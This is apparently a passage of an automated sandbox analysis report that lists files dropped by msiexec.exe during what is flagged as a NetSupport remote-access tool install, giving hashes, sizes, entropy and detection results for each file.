                                                                                                                    SHA-512:1BBCC4C4732ADEE87CA0092104741015D8AB8A9E5D21E6F805AE05BEC4A0F2889DBE12A9A28580EE5E1EE903F7FD42BC1CB750658F07D7408B60A19AA718439A
                                                                                                                    Malicious:false
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):57824
                                                                                                                    Entropy (8bit):6.862108284538071
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:768:lF4WcduX42gXhBksgUHVEDqAnIocwl1kkr2pe/NPHDHf/ckXr2pe/eJHDHf/cky:lF4DduX4lBnzyiwYkee/VjHPee/MjHu
                                                                                                                    MD5:59C2F14F34522E03B127851AD682FE5A
                                                                                                                    SHA1:AA6204D13BEC0D33D7B3BE1043222D3367AB110F
                                                                                                                    SHA-256:01DF4E94F6C64CE675F3E809889E3F4FA2182B9D5411A9584F239577C3FE8F20
                                                                                                                    SHA-512:98949C4C649F45DD3BDDED2DCFE19D2DB45F33CE2B9E0170A8A23C74B8D5746FF17EDD33D372F491F58F13913CF9C67545144B4235C2EC168832D321EDD3AC38
                                                                                                                    Malicious:true
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):8177120
                                                                                                                    Entropy (8bit):5.048395174836045
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:98304:aU4gcDUXCYllmuLc3Klq/Uq+PujPh6415zi:argcQj9c31f+PujU415+
                                                                                                                    MD5:E85AF106BEDAF5E96E5633537ED29D8C
                                                                                                                    SHA1:CD4E38AC92374C94CCBDE982613439788EFCB7DA
                                                                                                                    SHA-256:3B8CCEB2A7049E2B1288E35C1469D8E2B510E844292B96F8C86108B53448C6A8
                                                                                                                    SHA-512:1763A02C49FF03EA3581795636DD73C5105659685112B57A1FC9D92E60A1B0748C584F1FD1F27CBBC126ED2A72CE9C2C5332EF430604C33D6DF3099BAEA6D82E
                                                                                                                    Malicious:true
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\nsmres.dll, Author: Joe Security
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):96736
                                                                                                                    Entropy (8bit):6.808355354530158
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:1536:zMc3pwImQbF54NpbfukIEpOBfh76ORM7Cx1Iiee/bjHxR9ee/rjHJ:zMc3ppv4rbfu1cEV6ORM7CteqjteOjp
                                                                                                                    MD5:3C616AB2D7A5AC710E57CABCEB819CFA
                                                                                                                    SHA1:F447BFDB8D2C1220E73BA4E55E6752F224CFCC09
                                                                                                                    SHA-256:D39A4722318A7AA4782CB6837BE8989C24224B47A58AD8C639CF4C12FC97915A
                                                                                                                    SHA-512:B4E7C99CB41E4D7FE16B93192596E849B0E9F4749F4D1C0E7C552CE61B231BFBBD3A0B8DD8030938A069485035D0392339BEA157657BE6FCFF09B09021DBF9A5
                                                                                                                    Malicious:true
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\nspowershell.exe, Author: Joe Security
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:data
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):9221
                                                                                                                    Entropy (8bit):7.232259392017478
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:192:K/GHRiwQnYe+PjP1rhr7+vgwKjtlAur9ZCspE+TMAr4zTh:WnYPL/rPUHeMtzN
                                                                                                                    MD5:E30476931A500CBB1316218170DB3FDD
                                                                                                                    SHA1:40E8A0BEB0E6C9B5C1037D01E921418B47828C90
                                                                                                                    SHA-256:3DE96F95811CF5FAF09A1909CADD7637B9B19E07FCB320AAD6EB4A187F67FE47
                                                                                                                    SHA-512:7E2132B5CCE530D74F2694D491733AD1B5E43E37112EB5D7587862955C7C83EAA46C128D35BDA35F382D0455F809CDA23CCBCDC6F6618DAFB9FB3DF191EBEE65
                                                                                                                    Malicious:false
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:Windows setup INFormation
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):2930
                                                                                                                    Entropy (8bit):5.396768235621853
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:48:a0xFYjOMpjOOsLGjXivDAaUntuQwuHkvFuDf+nLE7ScxbnbCNTBfoNRS2KUKFN5K:aYmtjOOsGjXivDAaUntJ3Df+LeSUEeyW
                                                                                                                    MD5:78B6B809D8ABCCB9FA9BF540B7CCD363
                                                                                                                    SHA1:2D0BFD6DA3A14AA7E2B7B9BF0551A49D7665CE30
                                                                                                                    SHA-256:ACFB0123F62A8A4740361F77B9D34AA6481B2AA30153F56ED866F84507D69E0C
                                                                                                                    SHA-512:E16A728840724FD3B8E6DF3A1B0F476D66F54F0D1A795AAB2928ECD739E1B8D6B716882D5E4F5FBCD8BB2ED7EB6B7B279198938AC7E70D130D6A0B9404FD6200
                                                                                                                    Malicious:false
                                                                                                                    Preview:; NSPSCR.INF..; Copyright (c) 2008-2014 Net Support Limited....[Version]..DriverVer=05/22/2014,12.01..CatalogFile=nspscr.cat..Signature="$Windows NT$"..Class=SmartCardReader..ClassGuid={50DD5230-BA8A-11D1-BF5D-0000F805F530}..;Class = LegacyDriver..;ClassGuid = {8ecc055d-047f-11d1-a537-0000f8753ed1}..Provider=%MFG%....[ControlFlags]..; Prevent legacy install for PnP readers..ExcludeFromSelect=Root\NS-PseudoSmartCardReader....[Manufacturer]..%MFG%=NSL, NTAMD64....; ============ Add reg for all readers ===============....[Reader.Install.AddReg]..HKLM, Software\Microsoft\Cryptography\Calais\Readers,,,..HKLM, System\CurrentControlSet\Services\SCardSvr,Start,0x00010001,2..HKLM, System\CurrentControlSet\Services\CertPropSvc,Start,0x00010001,2....; ================= NSL readers =====================....[NSL.NTAMD64]..; DisplayName Section DeviceId..; ----------- ------- --------..%MFG.DeviceDesc% = PSCR.Install, Root\NS-PseudoSmartCardReader....[PSCR.Inst
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):27272
                                                                                                                    Entropy (8bit):6.237518432862503
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:384:aI2iS+JdAYLZCgM11FZgx4rbnjfpe0mSoXot5RJVO8WCT74Td2aQnYPL/rKeMPPW:a9BqdtbOjpe3TXobRJVki7cTQS
                                                                                                                    MD5:F56457F0C75E3D9B82C88B425CB5C95B
                                                                                                                    SHA1:4F6BE0D0CCDAAEEC42F5F45071C6063E00AE3EE4
                                                                                                                    SHA-256:6DA36B43A75611476B0ABBD4F2E81FC455B694306C9500F54DD2524985FF0E1A
                                                                                                                    SHA-512:635B72AF34E1E6B63C7CE659DF2B9A73EB537AB9127A3ABF920188C5F3CDF571DB3942282CED0BBAD8DB28D6DDA73C6623280250B886D2DA4D43A86884DB9F41
                                                                                                                    Malicious:true
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\nspscr.sys, Author: Joe Security
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):16632288
                                                                                                                    Entropy (8bit):4.729694563429236
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:98304:Ig23l4a23kKnTtFXg+/nkeA3jiDz6Ic6MWlNkJ1uxsh7ncWHrwGra:Ck3RnTnXgcGjiilQ3mn5n1rwf
                                                                                                                    MD5:AC850065D5807949D987F1E00F34DFF3
                                                                                                                    SHA1:4E3C564046BD4F655A958F299D6DB9198FB99FF8
                                                                                                                    SHA-256:D0BE908B5B2149896D5F6E28C2E3D0735ABC7B200EB88C7ECFA1974618417B77
                                                                                                                    SHA-512:630EEA09F442EA382AC142A2BE6CE3D82E25ED88CA87873B9D6E0E4D5902C7D134486A1ECAD50089C74FFECD1E5696F080345C3EFBCEFF9C818CF653FE0ABDD5
                                                                                                                    Malicious:true
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):49632
                                                                                                                    Entropy (8bit):7.033464466519071
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:768:3hGznfNnu0sbqmuebcTYCBU1wn+Pam8Arr2pe/PZDRHDHf/ckWOir2pe/ssHDHfm:3hGzfFDmmTYCtMawee/njHVyee/zjHe
                                                                                                                    MD5:97AF6CC2109C3195ECF019C4E988079D
                                                                                                                    SHA1:2B1A0ED3FA7C15D77A8C08FCA4CBB503CBBFAB0F
                                                                                                                    SHA-256:F02F921D5C52EF1D56585AC571A42502B62F571D02E80B88C99BF74C8F390733
                                                                                                                    SHA-512:085D7D1F65EAF18064FEE84AD4FB1F173922F1E8C60E058274CB70D28D242A9E25415C7E204313517425A736B7A534C7D6592B8B1F1F5B312E4CCFD0471465D1
                                                                                                                    Malicious:true
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicapi.dll, Author: Joe Security
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):120288
                                                                                                                    Entropy (8bit):5.251370253406986
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:1536:o+N4gcCvlwwYBg6vJcaW3eSu+ee/WjHwlee/UjH3:z4ZEROJcaieSreHj4eljX
                                                                                                                    MD5:B8ACD5C9E200166C6B4E5001AEEEAF20
                                                                                                                    SHA1:3C37EE9757CF6AB21F4876529436E15D14DA700B
                                                                                                                    SHA-256:FFBD328E86899F332ED8CB4A31B93814D363034793D875B871D44EBD0C5414BC
                                                                                                                    SHA-512:96982BFDD8334684F832DC3F5B36288F63E5F210F4AAF14B7A630A367E5BEF8FFAB13BC1C7193BE5E2D210179598ABC654DAE5A412F844856B292A2A3199EF05
                                                                                                                    Malicious:true
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exe, Author: Joe Security
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):77280
                                                                                                                    Entropy (8bit):6.755047083861626
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:1536:lPSdA+F6mXkAShLY9w5VnC6ee/GjHAfee/EOjH3:ladbQUShLY9w5VnC6enj2ekjX
                                                                                                                    MD5:92E0CD73327A7C8B0FDAD0B26F883895
                                                                                                                    SHA1:9C053C38BA7AC4720EBD55C1FD1F651508170230
                                                                                                                    SHA-256:E1E8946A82898C48E8D61AC398D3C548CC462A555EE41C67BDDC79FFBD131741
                                                                                                                    SHA-512:1F1161C6FF81046B468CEB3417AF88859F6D7E39D3CAA3BED692578084929037E478A84F9C9E409BC24B4919B6309A6B2FC82B7865E2CA1C5234970E317A92F4
                                                                                                                    Malicious:true
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pciconn.exe, Author: Joe Security
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):24470496
                                                                                                                    Entropy (8bit):5.634476864287587
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:196608:QWrPg1mPv8hXPx8Fv3Cwa/cs/Rp0se9YMg212:Q2Hv8hfeFvy3h/Rpve2rZ
                                                                                                                    MD5:9741168634198501D2907B3C10683D4E
                                                                                                                    SHA1:59153955D1DDB7EFD4B6BD9A0D24AD67938B5A14
                                                                                                                    SHA-256:D04A3992534AF3D8826D1F579FEDCE7477929EAC01E883063EACAA424D3F5218
                                                                                                                    SHA-512:1BEE509F17AB29D12FD2963A5F1EAF5592166215AA5C7BF570BFEBA1455D48DC64FC04DAEAA6F4C17FA8B0ECAF71D18DA6207E417C03713012CD27D8E9E019F5
                                                                                                                    Malicious:true
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcictl.dll, Author: Joe Security
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):22656
                                                                                                                    Entropy (8bit):6.252604525322096
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:384:fFZj8MgCiZetfffX3/9e0mfu2rjWevHqnYPL7NCUHeMZR:f8MXlfffX3/9e3z2evqEdR
                                                                                                                    MD5:84DEE0F25FE97868071202065DAB63BB
                                                                                                                    SHA1:64A6C2E0D4561A726BDCE5491D12693A96C45839
                                                                                                                    SHA-256:DE5ACE5C2A02AFB01A90BA39B305A8F3C783883012432D22912910EAD44AD60A
                                                                                                                    SHA-512:200A162CAD66B4EAF94B02F31FA6986028B42EA4497D234131CE3F6B8154146C00881FC75F63B077B0CCDD47A62340440884EFF2199F00D4F035622903FB8D1F
                                                                                                                    Malicious:true
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcisys.sys, Author: Joe Security
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):506
                                                                                                                    Entropy (8bit):4.906453708261214
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12:NUQi44RRN4CZCgivf2Ik2IgC0cxP/6Xrov:iJ4y4CZC/f2/2B2H6O
                                                                                                                    MD5:FF7C0D2DBB9195083BBABAFF482D5ED6
                                                                                                                    SHA1:5C2EFBF855C376CE1B93E681C54A367A407495DC
                                                                                                                    SHA-256:065D817596D710D5A06060241ACC207B82B844530CC56FF842FF53D8FF92A075
                                                                                                                    SHA-512:EA226B3A55FC59175136F104DF497EBF5055624FB1C1C8073B249DFC5E1ED5818A6FEEE995AA82CF9ED050F1ADC7A62994C90B1AF03569DFE0D4551EE2BC70C9
                                                                                                                    Malicious:false
                                                                                                                    Preview:5..0x61f7dbcb..LongName=NetSupport Manager..ShortName=NSM..Home=NSM..TLA=NSM..NSSName=NetSupport School..NSSTLA=NSS..SupportWWW=www.pci.co.uk/support|http://www.pci.co.uk/support..SupportEMail=support@pci.co.uk|mailto:support@pci.co.uk..NSMAppDataDir=NetSupport\NetSupport Manager..NSSAppDataDir=NetSupport\NetSupport School..NSSConfName=NetSupport School..AssistantName=Tutor Assistant..AssistantURL=http://www.netsupportschool.com/tutor-assistant.asp..TechConsole=1..SupportsChrome=1..SupportsAndroid=1..
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):39392
                                                                                                                    Entropy (8bit):7.268505171847185
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:768:vnIX3dawZwW87doDaK8r2pe/42/HDHf/ck6r2pe/s3zHDHf/ckW/:C3dFGWTO3ee/46jHeee/sDjHC
                                                                                                                    MD5:53608AEEEF65674552C7A28A4F918D1F
                                                                                                                    SHA1:DABE4E6DC6A7CF446BA76BDA7F18AAE7B08177E4
                                                                                                                    SHA-256:C8B9142A399CB7171F05379E34D4D1D34659A033FD99E994BABA103E6D0D8FE3
                                                                                                                    SHA-512:DF58AA3E582986B80A2FA3CD395B14357ABEC7A50FA790E1723F0F9B37477476782169EC86EC259ED210C4CBC1241EF1336182AAE5C6C87994D0B00D7C16A074
                                                                                                                    Malicious:true
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pscrinst.dll, Author: Joe Security
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):39904
                                                                                                                    Entropy (8bit):7.13635504885649
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:768:0E4XbRSshW4r2pe/6qHDHf/ckF6Nr2pe/XfJHDHf/ckbmr:uLktYee/vjHh6Jee/XRjHGr
                                                                                                                    MD5:834B482E183006E4CA6644CBA6F7A1A8
                                                                                                                    SHA1:E80B54FD273A31B6E70EA1514ABAE2B931E126D2
                                                                                                                    SHA-256:D0F829E161FB425667DAB3CAE56BFD3F0CC753145606A518B1C38BB5DCD4C100
                                                                                                                    SHA-512:3592A9540C9F5C33009E577449A426A8E1843E7F908178C911BD4410871B455485F2CE006D5BE5C2146C29252407BC9E11A6D8A583EF75CE73006444C7477E3B
                                                                                                                    Malicious:true
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pscrinst64.dll, Author: Joe Security
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):77280
                                                                                                                    Entropy (8bit):6.793769574007511
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:1536:1fafvTuNOwphKuyUHTqYXHhrXH4LLIywmoEee/MjHFee/s3jH9:1afLSpAFUzt0LLIywYeZjleRjd
                                                                                                                    MD5:B25AE8C65D0BAF1AD9B51DBF7E0E738A
                                                                                                                    SHA1:29EDDB6C96B9A58302B5FDF85919A231F448970A
                                                                                                                    SHA-256:340328207279A098B5C8CAFDF3A6E2DEB28C06C077D04423E084EBAD93353B83
                                                                                                                    SHA-512:8C22BF990978C752F6E6292CFB75B31228369E4B77D68DAA912D26302449217830E5C305446840765D3FB3F10EA575CE695A165E835570F0BC1DB44F2AB49BDA
                                                                                                                    Malicious:true
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):46832
                                                                                                                    Entropy (8bit):6.550943579230967
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:768:aYxDdwTWm8lJuEFer2pe/p+DHDHf/cklPr2pe/a/fHDHf/ckT:aYDwTelJuEFuee/kjHRee/OjHv
                                                                                                                    MD5:856CE968807C6915FE987E5D39FCC701
                                                                                                                    SHA1:30F881812243B98424BB22ED7CCD911E2BD0E2A1
                                                                                                                    SHA-256:96E0F092E8E930D0989AED462789045392C9159132A35DDDA513C18E495ADDBA
                                                                                                                    SHA-512:1D1500F95797CFC61728D10F17E1F22762DD7848CD5D8EA978A22170756C77AC9A5A2AC182C137DE8A49E149034CCBF6DA11547B757AFC90581DBABC90D1B048
                                                                                                                    Malicious:true
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PC bitmap, Windows 3.x format, 301 x 50 x 24, image size 45202, resolution 2834 x 2834 px/m, cbSize 45256, bits offset 54
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):45256
                                                                                                                    Entropy (8bit):1.7322107663428339
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:192:9w+PTPP6Q9k+BIwe0WRpLmfL8TkLUtyAeCzNPzat1Arxtgx/:9w+rPTTD8T90r6t+x
                                                                                                                    MD5:E9FCFFB9D2942FB4F8693D0955741C02
                                                                                                                    SHA1:7BE4057624103FD3A5A6127DD205797F0750DE5D
                                                                                                                    SHA-256:1D88DC4653BA74CFB65B74EA23CFA42B38A7A9367420C801E1267C27D218C740
                                                                                                                    SHA-512:9B01B09181BDDF01468B6D1AD61084D27F9FADDD1992A9B0449DA661E2BCFE443C0F668871676DF94E871DBDD9BB4F2F65E175C291AEAE4E1C007FEE6348E4E4
                                                                                                                    Malicious:false
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):2102752
                                                                                                                    Entropy (8bit):6.453089786609498
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:49152:e4PM40C89/wp1LsHQFT0qr/H8tTrp7zUbMwOi9NR/Feoke6fUiWZF7tfTHdWq:e4EG8a/sHQFTZHeTrp7zUbMwZhF7ke6W
                                                                                                                    MD5:A14A67BADCAFD7F70925865FC36CF23A
                                                                                                                    SHA1:987160B998D3C84DA5EA4A3D7687DC4B5B14F6A3
                                                                                                                    SHA-256:EB8529698A60A96E2224C298AE0CB8365A46898082CCCFE79356B23057A02A6C
                                                                                                                    SHA-512:AA592B65CB7DB2CC8D8E8F47E1CB1810F3BDF52D44724BB3902D04FFC73BDBDC80E4A0509F25E33A4C3D2C67BD2BB0E9CB6D0C77DF2E48FD1AFD277B3B3F1183
                                                                                                                    Malicious:true
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\supporttool.exe, Author: Joe Security
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):15766
                                                                                                                    Entropy (8bit):2.0905725373226205
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:48:K4S8+k29W8sEvVQAxN+Y9HC5TZ/gBCNLNLXC54x4I7cdpanub7Te7gMHDI31t+jY:XS5kEWR4QAxNXqdv34CcXjTe7uFiY
                                                                                                                    MD5:515B10CD836D4F5874037A43F1E77451
                                                                                                                    SHA1:8ADF1CE3954CF17169F468ED4DD350B0FD5C4CDA
                                                                                                                    SHA-256:90FF8555B7DBFE2CFE5D2761CCC491153B7C42085E0C490970BF9EB3C150F25A
                                                                                                                    SHA-512:9CEA72979FD5EA34579E67E9E17D6AF2F6FD354A88573A3D878DFDDF3C0AFD94FA02ABB42C5BCEB6F9D208BEC194018733B8EDA075ED8D36F7CE16C5402AFE2B
                                                                                                                    Malicious:false
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):4081
                                                                                                                    Entropy (8bit):7.869168767091338
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:96:NZ/I09Da01l+gmkyTt6Hk8nTo2IbRDzqMYCKg:NS0tKg9E05TovbRDznYE
                                                                                                                    MD5:0A5913FD6ECAE07F96F1FE4D2E9BE596
                                                                                                                    SHA1:C2CF5940D9FFED0E48A4C9BDB267A26132A6F7CD
                                                                                                                    SHA-256:3A7D175DC12A1A71DD4E1842321B03BDCD3E35F4AEA38D594E02A5AC883DD1C6
                                                                                                                    SHA-512:7BC5BD2785087655A58345171CCDB417FCA4AB4B1F74C743DDA853EEFA6F4A823A49B9172580BA4547CCD56E4BE095F8D9ACF5B6E83C2EAF56D5EA594434F8BA
                                                                                                                    Malicious:false
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):15345
                                                                                                                    Entropy (8bit):1.827778496152507
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:48:K4S8+k29W8sEv7BNBhxN+Y9Wn8+BC6tjLixBZI7cdpanub7ZQy7AZ:XS5kEWRyBNBhxNXW82KBZCcXjegI
                                                                                                                    MD5:51957F938C93454E2F3ED13519EBBFC6
                                                                                                                    SHA1:DF094723F61FEC1111C496D2AFC89FDE0EF80A44
                                                                                                                    SHA-256:A0EA911CFDF05131B779DE0816B0BEC0D833A9DA1B49AACB098B84A0F871CF56
                                                                                                                    SHA-512:3723A1C0314AE2396ED2E062F111762B4ED927A062876F189105FC46B9606B326934484C027DDD49F02BC273C924D40A7C96C0CC6375857D6A622CB8F631A72D
                                                                                                                    Malicious:false
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):883712
                                                                                                                    Entropy (8bit):6.824170675528273
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24576:0WmPrDND1ONC1r4pD84TfEXpS8sYsen/mKvTZuoy4YJp:DmPrBu1ygr
                                                                                                                    MD5:8ED02A1A11CEC72B6A6A4989BF03CFCC
                                                                                                                    SHA1:172908FF0F8D7E1C0CBF107F7075ED1DBA4B36C8
                                                                                                                    SHA-256:4FD02F2699C49579319079B963425991198F59CB1589B8AFA8795B5D6A0E5DB3
                                                                                                                    SHA-512:444FE62A5C324D38BDC055D298B5784C741F3CA8FAAEAED591BD6DCF94205DBF28C7D7F7D3825CCB99EFF04E3FFD831E3F98D9B314820841A0C0960AE6A5E416
                                                                                                                    Malicious:false
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):274256
                                                                                                                    Entropy (8bit):6.569709751417913
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3072:x4fMnGHxUCkewyeWmUyuueIDKTukcHWu2vizgPSA4qJH9013iSI3s:+fLHyApeWm4uTdkIWRizxkW1R
                                                                                                                    MD5:F45BBAC53C6DD05436F749ECBF22C1F2
                                                                                                                    SHA1:5F76AF19249B49505C36593434B68229357F52F9
                                                                                                                    SHA-256:0B85176125FC996D22B08D25A3344FC1E9C19ECC8A39D291F90ADB98EBAD6268
                                                                                                                    SHA-512:5B6BAE76F1A6CC8AA09E63802F157A53AC441608A158770FDCA5DE532BD74AA895AD8CB429A6A7CEE93844D7DE5882C0F1BC3BB433F4D1A9EC9FA6E1A5DEE5AA
                                                                                                                    Malicious:true
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):87360
                                                                                                                    Entropy (8bit):6.8832723005665555
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:1536:Q7cAKWRMbpuRQci+7uXTKLWe+27JofZo0ENm2eK7oJnoUSgpAY8ODcDcm7cIsXFf:Q73KiRQcJ7uj8f7Jofm0ENm2eK7mnoU5
                                                                                                                    MD5:479349B9C24C0A52F504292544492ACC
                                                                                                                    SHA1:70DA788FA83DDD85FF72308D176352FB87C3D01D
                                                                                                                    SHA-256:CBCA683F6832E6AEA627F6BCA32788BBA056B78F3ED43015B6B45F8B22407C1F
